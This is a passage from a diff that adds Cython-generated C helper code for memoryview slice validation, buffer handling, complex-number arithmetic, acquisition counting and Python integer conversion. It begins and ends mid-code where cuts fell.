fails, then we should clear the + fetched exception references and propagate the new exception */ + Py_XDECREF(ptype); + Py_XDECREF(pvalue); + Py_XDECREF(ptraceback); + goto bad; + } + __Pyx_ErrRestoreInState(tstate, ptype, pvalue, ptraceback); + __pyx_insert_code_object(c_line ? -c_line : py_line, py_code); + } + py_frame = PyFrame_New( + tstate, /*PyThreadState *tstate,*/ + py_code, /*PyCodeObject *code,*/ + __pyx_d, /*PyObject *globals,*/ + 0 /*PyObject *locals*/ + ); + if (!py_frame) goto bad; + __Pyx_PyFrame_SetLineNumber(py_frame, py_line); + PyTraceBack_Here(py_frame); +bad: + Py_XDECREF(py_code); + Py_XDECREF(py_frame); +} +#endif + +#if PY_MAJOR_VERSION < 3 +static int __Pyx_GetBuffer(PyObject *obj, Py_buffer *view, int flags) { + __Pyx_TypeName obj_type_name; + if (PyObject_CheckBuffer(obj)) return PyObject_GetBuffer(obj, view, flags); + if (__Pyx_TypeCheck(obj, __pyx_array_type)) return __pyx_array_getbuffer(obj, view, flags); + if (__Pyx_TypeCheck(obj, __pyx_memoryview_type)) return __pyx_memoryview_getbuffer(obj, view, flags); + obj_type_name = __Pyx_PyType_GetName(Py_TYPE(obj)); + PyErr_Format(PyExc_TypeError, + "'" __Pyx_FMT_TYPENAME "' does not have the buffer interface", + obj_type_name); + __Pyx_DECREF_TypeName(obj_type_name); + return -1; +} +static void __Pyx_ReleaseBuffer(Py_buffer *view) { + PyObject *obj = view->obj; + if (!obj) return; + if (PyObject_CheckBuffer(obj)) { + PyBuffer_Release(view); + return; + } + if ((0)) {} + view->obj = NULL; + Py_DECREF(obj); +} +#endif + + + /* MemviewSliceIsContig */ + static int +__pyx_memviewslice_is_contig(const __Pyx_memviewslice mvs, char order, int ndim) +{ + int i, index, step, start; + Py_ssize_t itemsize = mvs.memview->view.itemsize; + if (order == 'F') { + step = 1; + start = 0; + } else { + step = -1; + start = ndim - 1; + } + for (i = 0; i < ndim; i++) { + index = start + step * i; + if (mvs.suboffsets[index] >= 0 || mvs.strides[index] != itemsize) + return 0; + itemsize *= mvs.shape[index]; + } + return 1; +} + +/* OverlappingSlices */ + static void +__pyx_get_array_memory_extents(__Pyx_memviewslice *slice, + void **out_start, void **out_end, + int ndim, size_t itemsize) +{ + char *start, *end; + int i; + start = end = slice->data; + for (i = 0; i < ndim; i++) { + Py_ssize_t stride = slice->strides[i]; + Py_ssize_t extent = slice->shape[i]; + if (extent == 0) { + *out_start = *out_end = start; + return; + } else { + if (stride > 0) + end += stride * (extent - 1); + else + start += stride * (extent - 1); + } + } + *out_start = start; + *out_end = end + itemsize; +} +static int +__pyx_slices_overlap(__Pyx_memviewslice *slice1, + __Pyx_memviewslice *slice2, + int ndim, size_t itemsize) +{ + void *start1, *end1, *start2, *end2; + __pyx_get_array_memory_extents(slice1, &start1, &end1, ndim, itemsize); + __pyx_get_array_memory_extents(slice2, &start2, &end2, ndim, itemsize); + return (start1 < end2) && (start2 < end1); +} + +/* CIntFromPyVerify */ + #define __PYX_VERIFY_RETURN_INT(target_type, func_type, func_value)\ + __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, 0) +#define __PYX_VERIFY_RETURN_INT_EXC(target_type, func_type, func_value)\ + __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, 1) +#define __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, exc)\ + {\ + func_type value = func_value;\ + if (sizeof(target_type) < sizeof(func_type)) {\ + if (unlikely(value != (func_type) (target_type) value)) {\ + func_type zero = 0;\ + if (exc && unlikely(value == (func_type)-1 && PyErr_Occurred()))\ + return (target_type) -1;\ + if (is_unsigned && unlikely(value < zero))\ + goto raise_neg_overflow;\ + else\ + goto raise_overflow;\ + }\ + }\ + return (target_type) value;\ + } + +/* TypeInfoCompare */ + static int +__pyx_typeinfo_cmp(__Pyx_TypeInfo *a, __Pyx_TypeInfo *b) +{ + int i; + if (!a || !b) + return 0; + if (a == b) + return 1; + if (a->size != b->size || a->typegroup != b->typegroup || + a->is_unsigned != b->is_unsigned || a->ndim != b->ndim) { + if (a->typegroup == 'H' || b->typegroup == 'H') { + return a->size == b->size; + } else { + return 0; + } + } + if (a->ndim) { + for (i = 0; i < a->ndim; i++) + if (a->arraysize[i] != b->arraysize[i]) + return 0; + } + if (a->typegroup == 'S') { + if (a->flags != b->flags) + return 0; + if (a->fields || b->fields) { + if (!(a->fields && b->fields)) + return 0; + for (i = 0; a->fields[i].type && b->fields[i].type; i++) { + __Pyx_StructField *field_a = a->fields + i; + __Pyx_StructField *field_b = b->fields + i; + if (field_a->offset != field_b->offset || + !__pyx_typeinfo_cmp(field_a->type, field_b->type)) + return 0; + } + return !a->fields[i].type && !b->fields[i].type; + } + } + return 1; +} + +/* MemviewSliceValidateAndInit */ + static int +__pyx_check_strides(Py_buffer *buf, int dim, int ndim, int spec) +{ + if (buf->shape[dim] <= 1) + return 1; + if (buf->strides) { + if (spec & __Pyx_MEMVIEW_CONTIG) { + if (spec & (__Pyx_MEMVIEW_PTR|__Pyx_MEMVIEW_FULL)) { + if (unlikely(buf->strides[dim] != sizeof(void *))) { + PyErr_Format(PyExc_ValueError, + "Buffer is not indirectly contiguous " + "in dimension %d.", dim); + goto fail; + } + } else if (unlikely(buf->strides[dim] != buf->itemsize)) { + PyErr_SetString(PyExc_ValueError, + "Buffer and memoryview are not contiguous " + "in the same dimension."); + goto fail; + } + } + if (spec & __Pyx_MEMVIEW_FOLLOW) { + Py_ssize_t stride = buf->strides[dim]; + if (stride < 0) + stride = -stride; + if (unlikely(stride < buf->itemsize)) { + PyErr_SetString(PyExc_ValueError, + "Buffer and memoryview are not contiguous " + "in the same dimension."); + goto fail; + } + } + } else { + if (unlikely(spec & __Pyx_MEMVIEW_CONTIG && dim != ndim - 1)) { + PyErr_Format(PyExc_ValueError, + "C-contiguous buffer is not contiguous in " + "dimension %d", dim); + goto fail; + } else if (unlikely(spec & (__Pyx_MEMVIEW_PTR))) { + PyErr_Format(PyExc_ValueError, + "C-contiguous buffer is not indirect in " + "dimension %d", dim); + goto fail; + } else if (unlikely(buf->suboffsets)) { + PyErr_SetString(PyExc_ValueError, + "Buffer exposes suboffsets but no strides"); + goto fail; + } + } + return 1; +fail: + return 0; +} +static int +__pyx_check_suboffsets(Py_buffer *buf, int dim, int ndim, int spec) +{ + CYTHON_UNUSED_VAR(ndim); + if (spec & __Pyx_MEMVIEW_DIRECT) { + if (unlikely(buf->suboffsets && buf->suboffsets[dim] >= 0)) { + PyErr_Format(PyExc_ValueError, + "Buffer not compatible with direct access " + "in dimension %d.", dim); + goto fail; + } + } + if (spec & __Pyx_MEMVIEW_PTR) { + if (unlikely(!buf->suboffsets || (buf->suboffsets[dim] < 0))) { + PyErr_Format(PyExc_ValueError, + "Buffer is not indirectly accessible " + "in dimension %d.", dim); + goto fail; + } + } + return 1; +fail: + return 0; +} +static int +__pyx_verify_contig(Py_buffer *buf, int ndim, int c_or_f_flag) +{ + int i; + if (c_or_f_flag & __Pyx_IS_F_CONTIG) { + Py_ssize_t stride = 1; + for (i = 0; i < ndim; i++) { + if (unlikely(stride * buf->itemsize != buf->strides[i] && buf->shape[i] > 1)) { + PyErr_SetString(PyExc_ValueError, + "Buffer not fortran contiguous."); + goto fail; + } + stride = stride * buf->shape[i]; + } + } else if (c_or_f_flag & __Pyx_IS_C_CONTIG) { + Py_ssize_t stride = 1; + for (i = ndim - 1; i >- 1; i--) { + if (unlikely(stride * buf->itemsize != buf->strides[i] && buf->shape[i] > 1)) { + PyErr_SetString(PyExc_ValueError, + "Buffer not C contiguous."); + goto fail; + } + stride = stride * buf->shape[i]; + } + } + return 1; +fail: + return 0; +} +static int __Pyx_ValidateAndInit_memviewslice( + int *axes_specs, + int c_or_f_flag, + int buf_flags, + int ndim, + __Pyx_TypeInfo *dtype, + __Pyx_BufFmt_StackElem stack[], + __Pyx_memviewslice *memviewslice, + PyObject *original_obj) +{ + struct __pyx_memoryview_obj *memview, *new_memview; + __Pyx_RefNannyDeclarations + Py_buffer *buf; + int i, spec = 0, retval = -1; + __Pyx_BufFmt_Context ctx; + int from_memoryview = __pyx_memoryview_check(original_obj); + __Pyx_RefNannySetupContext("ValidateAndInit_memviewslice", 0); + if (from_memoryview && __pyx_typeinfo_cmp(dtype, ((struct __pyx_memoryview_obj *) + original_obj)->typeinfo)) { + memview = (struct __pyx_memoryview_obj *) original_obj; + new_memview = NULL; + } else { + memview = (struct __pyx_memoryview_obj *) __pyx_memoryview_new( + original_obj, buf_flags, 0, dtype); + new_memview = memview; + if (unlikely(!memview)) + goto fail; + } + buf = &memview->view; + if (unlikely(buf->ndim != ndim)) { + PyErr_Format(PyExc_ValueError, + "Buffer has wrong number of dimensions (expected %d, got %d)", + ndim, buf->ndim); + goto fail; + } + if (new_memview) { + __Pyx_BufFmt_Init(&ctx, stack, dtype); + if (unlikely(!__Pyx_BufFmt_CheckString(&ctx, buf->format))) goto fail; + } + if (unlikely((unsigned) buf->itemsize != dtype->size)) { + PyErr_Format(PyExc_ValueError, + "Item size of buffer (%" CYTHON_FORMAT_SSIZE_T "u byte%s) " + "does not match size of '%s' (%" CYTHON_FORMAT_SSIZE_T "u byte%s)", + buf->itemsize, + (buf->itemsize > 1) ? "s" : "", + dtype->name, + dtype->size, + (dtype->size > 1) ? "s" : ""); + goto fail; + } + if (buf->len > 0) { + for (i = 0; i < ndim; i++) { + spec = axes_specs[i]; + if (unlikely(!__pyx_check_strides(buf, i, ndim, spec))) + goto fail; + if (unlikely(!__pyx_check_suboffsets(buf, i, ndim, spec))) + goto fail; + } + if (unlikely(buf->strides && !__pyx_verify_contig(buf, ndim, c_or_f_flag))) + goto fail; + } + if (unlikely(__Pyx_init_memviewslice(memview, ndim, memviewslice, + new_memview != NULL) == -1)) { + goto fail; + } + retval = 0; + goto no_fail; +fail: + Py_XDECREF(new_memview); + retval = -1; +no_fail: + __Pyx_RefNannyFinishContext(); + return retval; +} + +/* ObjectToMemviewSlice */ + static CYTHON_INLINE __Pyx_memviewslice __Pyx_PyObject_to_MemoryviewSlice_dcd__double(PyObject *obj, int writable_flag) { + __Pyx_memviewslice result = { 0, 0, { 0 }, { 0 }, { 0 } }; + __Pyx_BufFmt_StackElem stack[1]; + int axes_specs[] = { (__Pyx_MEMVIEW_DIRECT | __Pyx_MEMVIEW_CONTIG), (__Pyx_MEMVIEW_DIRECT | __Pyx_MEMVIEW_FOLLOW) }; + int retcode; + if (obj == Py_None) { + result.memview = (struct __pyx_memoryview_obj *) Py_None; + return result; + } + retcode = __Pyx_ValidateAndInit_memviewslice(axes_specs, __Pyx_IS_F_CONTIG, + (PyBUF_F_CONTIGUOUS | PyBUF_FORMAT) | writable_flag, 2, + &__Pyx_TypeInfo_double, stack, + &result, obj); + if (unlikely(retcode == -1)) + goto __pyx_fail; + return result; +__pyx_fail: + result.memview = NULL; + result.data = NULL; + return result; +} + +/* ObjectToMemviewSlice */ + static CYTHON_INLINE __Pyx_memviewslice __Pyx_PyObject_to_MemoryviewSlice_dc_unsigned_char(PyObject *obj, int writable_flag) { + __Pyx_memviewslice result = { 0, 0, { 0 }, { 0 }, { 0 } }; + __Pyx_BufFmt_StackElem stack[1]; + int axes_specs[] = { (__Pyx_MEMVIEW_DIRECT | __Pyx_MEMVIEW_CONTIG) }; + int retcode; + if (obj == Py_None) { + result.memview = (struct __pyx_memoryview_obj *) Py_None; + return result; + } + retcode = __Pyx_ValidateAndInit_memviewslice(axes_specs, __Pyx_IS_C_CONTIG, + (PyBUF_C_CONTIGUOUS | PyBUF_FORMAT) | writable_flag, 1, + &__Pyx_TypeInfo_unsigned_char, stack, + &result, obj); + if (unlikely(retcode == -1)) + goto __pyx_fail; + return result; +__pyx_fail: + result.memview = NULL; + result.data = NULL; + return result; +} + +/* Declarations */ + #if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) + #ifdef __cplusplus + static CYTHON_INLINE __pyx_t_float_complex __pyx_t_float_complex_from_parts(float x, float y) { + return ::std::complex< float >(x, y); + } + #else + static CYTHON_INLINE __pyx_t_float_complex __pyx_t_float_complex_from_parts(float x, float y) { + return x + y*(__pyx_t_float_complex)_Complex_I; + } + #endif +#else + static CYTHON_INLINE __pyx_t_float_complex __pyx_t_float_complex_from_parts(float x, float y) { + __pyx_t_float_complex z; + z.real = x; + z.imag = y; + return z; + } +#endif + +/* Arithmetic */ + #if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) +#else + static CYTHON_INLINE int __Pyx_c_eq_float(__pyx_t_float_complex a, __pyx_t_float_complex b) { + return (a.real == b.real) && (a.imag == b.imag); + } + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_sum_float(__pyx_t_float_complex a, __pyx_t_float_complex b) { + __pyx_t_float_complex z; + z.real = a.real + b.real; + z.imag = a.imag + b.imag; + return z; + } + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_diff_float(__pyx_t_float_complex a, __pyx_t_float_complex b) { + __pyx_t_float_complex z; + z.real = a.real - b.real; + z.imag = a.imag - b.imag; + return z; + } + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_prod_float(__pyx_t_float_complex a, __pyx_t_float_complex b) { + __pyx_t_float_complex z; + z.real = a.real * b.real - a.imag * b.imag; + z.imag = a.real * b.imag + a.imag * b.real; + return z; + } + #if 1 + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_quot_float(__pyx_t_float_complex a, __pyx_t_float_complex b) { + if (b.imag == 0) { + return __pyx_t_float_complex_from_parts(a.real / b.real, a.imag / b.real); + } else if (fabsf(b.real) >= fabsf(b.imag)) { + if (b.real == 0 && b.imag == 0) { + return __pyx_t_float_complex_from_parts(a.real / b.real, a.imag / b.imag); + } else { + float r = b.imag / b.real; + float s = (float)(1.0) / (b.real + b.imag * r); + return __pyx_t_float_complex_from_parts( + (a.real + a.imag * r) * s, (a.imag - a.real * r) * s); + } + } else { + float r = b.real / b.imag; + float s = (float)(1.0) / (b.imag + b.real * r); + return __pyx_t_float_complex_from_parts( + (a.real * r + a.imag) * s, (a.imag * r - a.real) * s); + } + } + #else + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_quot_float(__pyx_t_float_complex a, __pyx_t_float_complex b) { + if (b.imag == 0) { + return __pyx_t_float_complex_from_parts(a.real / b.real, a.imag / b.real); + } else { + float denom = b.real * b.real + b.imag * b.imag; + return __pyx_t_float_complex_from_parts( + (a.real * b.real + a.imag * b.imag) / denom, + (a.imag * b.real - a.real * b.imag) / denom); + } + } + #endif + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_neg_float(__pyx_t_float_complex a) { + __pyx_t_float_complex z; + z.real = -a.real; + z.imag = -a.imag; + return z; + } + static CYTHON_INLINE int __Pyx_c_is_zero_float(__pyx_t_float_complex a) { + return (a.real == 0) && (a.imag == 0); + } + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_conj_float(__pyx_t_float_complex a) { + __pyx_t_float_complex z; + z.real = a.real; + z.imag = -a.imag; + return z; + } + #if 1 + static CYTHON_INLINE float __Pyx_c_abs_float(__pyx_t_float_complex z) { + #if !defined(HAVE_HYPOT) || defined(_MSC_VER) + return sqrtf(z.real*z.real + z.imag*z.imag); + #else + return hypotf(z.real, z.imag); + #endif + } + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_pow_float(__pyx_t_float_complex a, __pyx_t_float_complex b) { + __pyx_t_float_complex z; + float r, lnr, theta, z_r, z_theta; + if (b.imag == 0 && b.real == (int)b.real) { + if (b.real < 0) { + float denom = a.real * a.real + a.imag * a.imag; + a.real = a.real / denom; + a.imag = -a.imag / denom; + b.real = -b.real; + } + switch ((int)b.real) { + case 0: + z.real = 1; + z.imag = 0; + return z; + case 1: + return a; + case 2: + return __Pyx_c_prod_float(a, a); + case 3: + z = __Pyx_c_prod_float(a, a); + return __Pyx_c_prod_float(z, a); + case 4: + z = __Pyx_c_prod_float(a, a); + return __Pyx_c_prod_float(z, z); + } + } + if (a.imag == 0) { + if (a.real == 0) { + return a; + } else if ((b.imag == 0) && (a.real >= 0)) { + z.real = powf(a.real, b.real); + z.imag = 0; + return z; + } else if (a.real > 0) { + r = a.real; + theta = 0; + } else { + r = -a.real; + theta = atan2f(0.0, -1.0); + } + } else { + r = __Pyx_c_abs_float(a); + theta = atan2f(a.imag, a.real); + } + lnr = logf(r); + z_r = expf(lnr * b.real - theta * b.imag); + z_theta = theta * b.real + lnr * b.imag; + z.real = z_r * cosf(z_theta); + z.imag = z_r * sinf(z_theta); + return z; + } + #endif +#endif + +/* Declarations */ + #if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) + #ifdef __cplusplus + static CYTHON_INLINE __pyx_t_double_complex __pyx_t_double_complex_from_parts(double x, double y) { + return ::std::complex< double >(x, y); + } + #else + static CYTHON_INLINE __pyx_t_double_complex __pyx_t_double_complex_from_parts(double x, double y) { + return x + y*(__pyx_t_double_complex)_Complex_I; + } + #endif +#else + static CYTHON_INLINE __pyx_t_double_complex __pyx_t_double_complex_from_parts(double x, double y) { + __pyx_t_double_complex z; + z.real = x; + z.imag = y; + return z; + } +#endif + +/* Arithmetic */ + #if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) +#else + static CYTHON_INLINE int __Pyx_c_eq_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { + return (a.real == b.real) && (a.imag == b.imag); + } + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_sum_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { + __pyx_t_double_complex z; + z.real = a.real + b.real; + z.imag = a.imag + b.imag; + return z; + } + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_diff_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { + __pyx_t_double_complex z; + z.real = a.real - b.real; + z.imag = a.imag - b.imag; + return z; + } + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_prod_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { + __pyx_t_double_complex z; + z.real = a.real * b.real - a.imag * b.imag; + z.imag = a.real * b.imag + a.imag * b.real; + return z; + } + #if 1 + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_quot_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { + if (b.imag == 0) { + return __pyx_t_double_complex_from_parts(a.real / b.real, a.imag / b.real); + } else if (fabs(b.real) >= fabs(b.imag)) { + if (b.real == 0 && b.imag == 0) { + return __pyx_t_double_complex_from_parts(a.real / b.real, a.imag / b.imag); + } else { + double r = b.imag / b.real; + double s = (double)(1.0) / (b.real + b.imag * r); + return __pyx_t_double_complex_from_parts( + (a.real + a.imag * r) * s, (a.imag - a.real * r) * s); + } + } else { + double r = b.real / b.imag; + double s = (double)(1.0) / (b.imag + b.real * r); + return __pyx_t_double_complex_from_parts( + (a.real * r + a.imag) * s, (a.imag * r - a.real) * s); + } + } + #else + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_quot_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { + if (b.imag == 0) { + return __pyx_t_double_complex_from_parts(a.real / b.real, a.imag / b.real); + } else { + double denom = b.real * b.real + b.imag * b.imag; + return __pyx_t_double_complex_from_parts( + (a.real * b.real + a.imag * b.imag) / denom, + (a.imag * b.real - a.real * b.imag) / denom); + } + } + #endif + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_neg_double(__pyx_t_double_complex a) { + __pyx_t_double_complex z; + z.real = -a.real; + z.imag = -a.imag; + return z; + } + static CYTHON_INLINE int __Pyx_c_is_zero_double(__pyx_t_double_complex a) { + return (a.real == 0) && (a.imag == 0); + } + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_conj_double(__pyx_t_double_complex a) { + __pyx_t_double_complex z; + z.real = a.real; + z.imag = -a.imag; + return z; + } + #if 1 + static CYTHON_INLINE double __Pyx_c_abs_double(__pyx_t_double_complex z) { + #if !defined(HAVE_HYPOT) || defined(_MSC_VER) + return sqrt(z.real*z.real + z.imag*z.imag); + #else + return hypot(z.real, z.imag); + #endif + } + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_pow_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { + __pyx_t_double_complex z; + double r, lnr, theta, z_r, z_theta; + if (b.imag == 0 && b.real == (int)b.real) { + if (b.real < 0) { + double denom = a.real * a.real + a.imag * a.imag; + a.real = a.real / denom; + a.imag = -a.imag / denom; + b.real = -b.real; + } + switch ((int)b.real) { + case 0: + z.real = 1; + z.imag = 0; + return z; + case 1: + return a; + case 2: + return __Pyx_c_prod_double(a, a); + case 3: + z = __Pyx_c_prod_double(a, a); + return __Pyx_c_prod_double(z, a); + case 4: + z = __Pyx_c_prod_double(a, a); + return __Pyx_c_prod_double(z, z); + } + } + if (a.imag == 0) { + if (a.real == 0) { + return a; + } else if ((b.imag == 0) && (a.real >= 0)) { + z.real = pow(a.real, b.real); + z.imag = 0; + return z; + } else if (a.real > 0) { + r = a.real; + theta = 0; + } else { + r = -a.real; + theta = atan2(0.0, -1.0); + } + } else { + r = __Pyx_c_abs_double(a); + theta = atan2(a.imag, a.real); + } + lnr = log(r); + z_r = exp(lnr * b.real - theta * b.imag); + z_theta = theta * b.real + lnr * b.imag; + z.real = z_r * cos(z_theta); + z.imag = z_r * sin(z_theta); + return z; + } + #endif +#endif + +/* MemviewSliceCopyTemplate */ + static __Pyx_memviewslice +__pyx_memoryview_copy_new_contig(const __Pyx_memviewslice *from_mvs, + const char *mode, int ndim, + size_t sizeof_dtype, int contig_flag, + int dtype_is_object) +{ + __Pyx_RefNannyDeclarations + int i; + __Pyx_memviewslice new_mvs = { 0, 0, { 0 }, { 0 }, { 0 } }; + struct __pyx_memoryview_obj *from_memview = from_mvs->memview; + Py_buffer *buf = &from_memview->view; + PyObject *shape_tuple = NULL; + PyObject *temp_int = NULL; + struct __pyx_array_obj *array_obj = NULL; + struct __pyx_memoryview_obj *memview_obj = NULL; + __Pyx_RefNannySetupContext("__pyx_memoryview_copy_new_contig", 0); + for (i = 0; i < ndim; i++) { + if (unlikely(from_mvs->suboffsets[i] >= 0)) { + PyErr_Format(PyExc_ValueError, "Cannot copy memoryview slice with " + "indirect dimensions (axis %d)", i); + goto fail; + } + } + shape_tuple = PyTuple_New(ndim); + if (unlikely(!shape_tuple)) { + goto fail; + } + __Pyx_GOTREF(shape_tuple); + for(i = 0; i < ndim; i++) { + temp_int = PyInt_FromSsize_t(from_mvs->shape[i]); + if(unlikely(!temp_int)) { + goto fail; + } else { + PyTuple_SET_ITEM(shape_tuple, i, temp_int); + temp_int = NULL; + } + } + array_obj = __pyx_array_new(shape_tuple, sizeof_dtype, buf->format, (char *) mode, NULL); + if (unlikely(!array_obj)) { + goto fail; + } + __Pyx_GOTREF(array_obj); + memview_obj = (struct __pyx_memoryview_obj *) __pyx_memoryview_new( + (PyObject *) array_obj, contig_flag, + dtype_is_object, + from_mvs->memview->typeinfo); + if (unlikely(!memview_obj)) + goto fail; + if (unlikely(__Pyx_init_memviewslice(memview_obj, ndim, &new_mvs, 1) < 0)) + goto fail; + if (unlikely(__pyx_memoryview_copy_contents(*from_mvs, new_mvs, ndim, ndim, + dtype_is_object) < 0)) + goto fail; + goto no_fail; +fail: + __Pyx_XDECREF(new_mvs.memview); + new_mvs.memview = NULL; + new_mvs.data = NULL; +no_fail: + __Pyx_XDECREF(shape_tuple); + __Pyx_XDECREF(temp_int); + __Pyx_XDECREF(array_obj); + __Pyx_RefNannyFinishContext(); + return new_mvs; +} + +/* MemviewSliceInit */ + static int +__Pyx_init_memviewslice(struct __pyx_memoryview_obj *memview, + int ndim, + __Pyx_memviewslice *memviewslice, + int memview_is_new_reference) +{ + __Pyx_RefNannyDeclarations + int i, retval=-1; + Py_buffer *buf = &memview->view; + __Pyx_RefNannySetupContext("init_memviewslice", 0); + if (unlikely(memviewslice->memview || memviewslice->data)) { + PyErr_SetString(PyExc_ValueError, + "memviewslice is already initialized!"); + goto fail; + } + if (buf->strides) { + for (i = 0; i < ndim; i++) { + memviewslice->strides[i] = buf->strides[i]; + } + } else { + Py_ssize_t stride = buf->itemsize; + for (i = ndim - 1; i >= 0; i--) { + memviewslice->strides[i] = stride; + stride *= buf->shape[i]; + } + } + for (i = 0; i < ndim; i++) { + memviewslice->shape[i] = buf->shape[i]; + if (buf->suboffsets) { + memviewslice->suboffsets[i] = buf->suboffsets[i]; + } else { + memviewslice->suboffsets[i] = -1; + } + } + memviewslice->memview = memview; + memviewslice->data = (char *)buf->buf; + if (__pyx_add_acquisition_count(memview) == 0 && !memview_is_new_reference) { + Py_INCREF(memview); + } + retval = 0; + goto no_fail; +fail: + memviewslice->memview = 0; + memviewslice->data = 0; + retval = -1; +no_fail: + __Pyx_RefNannyFinishContext(); + return retval; +} +#ifndef Py_NO_RETURN +#define Py_NO_RETURN +#endif +static void __pyx_fatalerror(const char *fmt, ...) Py_NO_RETURN { + va_list vargs; + char msg[200]; +#if PY_VERSION_HEX >= 0x030A0000 || defined(HAVE_STDARG_PROTOTYPES) + va_start(vargs, fmt); +#else + va_start(vargs); +#endif + vsnprintf(msg, 200, fmt, vargs); + va_end(vargs); + Py_FatalError(msg); +} +static CYTHON_INLINE int +__pyx_add_acquisition_count_locked(__pyx_atomic_int_type *acquisition_count, + PyThread_type_lock lock) +{ + int result; + PyThread_acquire_lock(lock, 1); + result = (*acquisition_count)++; + PyThread_release_lock(lock); + return result; +} +static CYTHON_INLINE int +__pyx_sub_acquisition_count_locked(__pyx_atomic_int_type *acquisition_count, + PyThread_type_lock lock) +{ + int result; + PyThread_acquire_lock(lock, 1); + result = (*acquisition_count)--; + PyThread_release_lock(lock); + return result; +} +static CYTHON_INLINE void +__Pyx_INC_MEMVIEW(__Pyx_memviewslice *memslice, int have_gil, int lineno) +{ + __pyx_nonatomic_int_type old_acquisition_count; + struct __pyx_memoryview_obj *memview = memslice->memview; + if (unlikely(!memview || (PyObject *) memview == Py_None)) { + return; + } + old_acquisition_count = __pyx_add_acquisition_count(memview); + if (unlikely(old_acquisition_count <= 0)) { + if (likely(old_acquisition_count == 0)) { + if (have_gil) { + Py_INCREF((PyObject *) memview); + } else { + PyGILState_STATE _gilstate = PyGILState_Ensure(); + Py_INCREF((PyObject *) memview); + PyGILState_Release(_gilstate); + } + } else { + __pyx_fatalerror("Acquisition count is %d (line %d)", + old_acquisition_count+1, lineno); + } + } +} +static CYTHON_INLINE void __Pyx_XCLEAR_MEMVIEW(__Pyx_memviewslice *memslice, + int have_gil, int lineno) { + __pyx_nonatomic_int_type old_acquisition_count; + struct __pyx_memoryview_obj *memview = memslice->memview; + if (unlikely(!memview || (PyObject *) memview == Py_None)) { + memslice->memview = NULL; + return; + } + old_acquisition_count = __pyx_sub_acquisition_count(memview); + memslice->data = NULL; + if (likely(old_acquisition_count > 1)) { + memslice->memview = NULL; + } else if (likely(old_acquisition_count == 1)) { + if (have_gil) { + Py_CLEAR(memslice->memview); + } else { + PyGILState_STATE _gilstate = PyGILState_Ensure(); + Py_CLEAR(memslice->memview); + PyGILState_Release(_gilstate); + } + } else { + __pyx_fatalerror("Acquisition count is %d (line %d)", + old_acquisition_count-1, lineno); + } +} + +/* CIntFromPy */ + static CYTHON_INLINE int __Pyx_PyInt_As_int(PyObject *x) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const int neg_one = (int) -1, const_zero = (int) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x))) { + if ((sizeof(int) < sizeof(long))) { + __PYX_VERIFY_RETURN_INT(int, long, PyInt_AS_LONG(x)) + } else { + long val = PyInt_AS_LONG(x); + if (is_unsigned && unlikely(val < 0)) { + goto raise_neg_overflow; + } + return (int) val; + } + } else +#endif + if (likely(PyLong_Check(x))) { + if (is_unsigned) { +#if CYTHON_USE_PYLONG_INTERNALS + if (unlikely(__Pyx_PyLong_IsNeg(x))) { + goto raise_neg_overflow; + } else if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(int, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_DigitCount(x)) { + case 2: + if ((8 * sizeof(int) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) >= 2 * PyLong_SHIFT)) { + return (int) (((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); + } + } + break; + case 3: + if ((8 * sizeof(int) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) >= 3 * PyLong_SHIFT)) { + return (int) (((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); + } + } + break; + case 4: + if ((8 * sizeof(int) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | 